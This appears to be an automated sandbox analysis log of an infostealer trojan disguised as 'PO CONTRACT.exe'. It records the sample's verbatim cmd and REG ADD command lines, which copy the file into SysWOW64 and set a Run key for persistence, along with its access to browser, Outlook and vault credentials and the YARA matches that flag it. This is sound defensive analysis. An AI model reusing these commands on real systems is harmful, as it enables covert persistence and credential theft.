Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_013F4420
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_013FC8C9
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_013F37E0
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_013F1300
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056C9D48
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CBD50
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CA480
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CAE50
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056C8148
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056C9D17
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CA470
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CBC58
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CE4C8
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CE4B8
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CD7E0
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CD7F0
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CDE60
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CAE40
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CDE50
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056C8139
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056C9108
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056C9118
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CE088
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CE098
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CCBE8
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CCBF8
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CDAE0
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_056CDAF0
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_09170AB8
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0917E915
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0917E950
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_09170006
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_09170040
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A75A248
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A754AA8
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A754280
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A754048
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A7528E0
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A754270
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A753210
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A754A99
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A752B70
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A75AB30
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A752B80
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A753878
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A750040
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A754038
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A75003A
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A7568E8
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A7528D1
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_0A7585E0
Source: C:\Windows\SysWOW64\SOA.exe | Code function: 10_2_09170A94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 11_2_02F9D260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 11_2_02F9A0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 11_2_02F94AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 11_2_02F99818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 11_2_02F93EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 11_2_02F94200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 11_2_02F9A092
Source: PO CONTRACT.exe, 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamed04b9152-f33d-48a0-b781-4be8ad9dc338.exe4 vs PO CONTRACT.exe
Source: PO CONTRACT.exe, 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamed04b9152-f33d-48a0-b781-4be8ad9dc338.exe4 vs PO CONTRACT.exe
Source: PO CONTRACT.exe, 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameHPzFG9.dll" vs PO CONTRACT.exe
Source: PO CONTRACT.exe, 00000000.00000002.35998232560.00000000011EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PO CONTRACT.exe
Source: PO CONTRACT.exe, 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamed04b9152-f33d-48a0-b781-4be8ad9dc338.exe4 vs PO CONTRACT.exe
Source: PO CONTRACT.exe, 00000000.00000002.36011026094.0000000006900000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameHPzFG9.dll" vs PO CONTRACT.exe
Source: PO CONTRACT.exe, 00000000.00000000.35638092872.0000000000A30000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameDDI.exeD vs PO CONTRACT.exe
Source: PO CONTRACT.exe, 00000000.00000002.36008654605.00000000059D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameHPzFG9.dll" vs PO CONTRACT.exe
Source: PO CONTRACT.exe | Binary or memory string: OriginalFilenameDDI.exeD vs PO CONTRACT.exe
Source: PO CONTRACT.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe"
Source: 0.2.PO CONTRACT.exe.4044ef2.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.SOA.exe.401c15a.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.SOA.exe.3fe0f9a.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.PO CONTRACT.exe.5747378.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.PO CONTRACT.exe.3fceb62.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.SOA.exe.3fa5dca.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.PO CONTRACT.exe.4009d32.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.SOA.exe.3fe0f9a.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.SOA.exe.401c15a.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.SOA.exe.570c1d8.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.PO CONTRACT.exe.4044ef2.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.SOA.exe.570c1d8.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PO CONTRACT.exe.4009d32.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.SOA.exe.3fa5dca.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PO CONTRACT.exe.5747378.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: PO CONTRACT.exe, q3.csCryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, iW8xDDFHHu.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, 3QjbQ514BDx.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, FZ6.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, FZ6.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: PO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb##
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/10@0/1
Source: C:\Users\user\Desktop\PO CONTRACT.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO CONTRACT.exe.log
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2696:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2540:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3572:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3572:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2540:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2696:304:WilStaging_02
Source: PO CONTRACT.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PO CONTRACT.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PO CONTRACT.exe | Virustotal: Detection: 34%
Source: PO CONTRACT.exe | ReversingLabs: Detection: 47%
Source: C:\Users\user\Desktop\PO CONTRACT.exe | File read: C:\Users\user\Desktop\PO CONTRACT.exe
Source: unknown | Process created: C:\Users\user\Desktop\PO CONTRACT.exe "C:\Users\user\Desktop\PO CONTRACT.exe"
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 36
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 43 > nul && copy "C:\Users\user\Desktop\PO CONTRACT.exe" "C:\Windows\SysWOW64\SOA.exe" && ping 127.0.0.1 -n 43 > nul && "C:\Windows\SysWOW64\SOA.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 43
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 43
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\SOA.exe "C:\Windows\SysWOW64\SOA.exe"
Source: C:\Windows\SysWOW64\SOA.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\SOA.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\PO CONTRACT.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: PO CONTRACT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PO CONTRACT.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: PO CONTRACT.exe | Static file information: File size 2417152 > 1048576
Source: PO CONTRACT.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x24da00
Source: PO CONTRACT.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll | source: GUIVTme.exe, 0000000D.00000000.37571661992.0000000000452000.00000002.00000001.01000000.0000000A.sdmp, GUIVTme.exe.11.dr
Source: Binary string: indows\Microsoft.VisualBasic.pdbpdbsic.pdb | source: PO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lBasic.pdb | source: PO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb | source: GUIVTme.exe, 0000000D.00000000.37571661992.0000000000452000.00000002.00000001.01000000.0000000A.sdmp, GUIVTme.exe.11.dr
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb## | source: PO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: til.pdb | source: InstallUtil.exe, 0000000B.00000002.40726882971.0000000006479000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match | File source: 0.2.PO CONTRACT.exe.4044ef2.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.401c15a.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.3fe0f9a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.3fceb62.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.3fa5dca.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.4009d32.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.3fe0f9a.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.401c15a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.57d1038.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.4044ef2.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.4009d32.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.57d1038.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.6900000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.6900000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SOA.exe.3fa5dca.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO CONTRACT.exe.5747378.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.36011026094.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.36000430187.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.36008654605.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.37452537402.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO CONTRACT.exe PID: 4388, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SOA.exe PID: 7300, type: MEMORYSTR
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_02D66D72 push edx; ret 0_2_02D66D73
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_056B8968 push es; iretd 0_2_056BA27C
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_056B3ADC push es; ret 0_2_056B3AE0
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_08F57A07 pushad ; ret 0_2_08F57B13
Source: C:\Users\user\Desktop\PO CONTRACT.exe | Code function: 0_2_08F56C7D push eax; ret 0_2_08F56D86
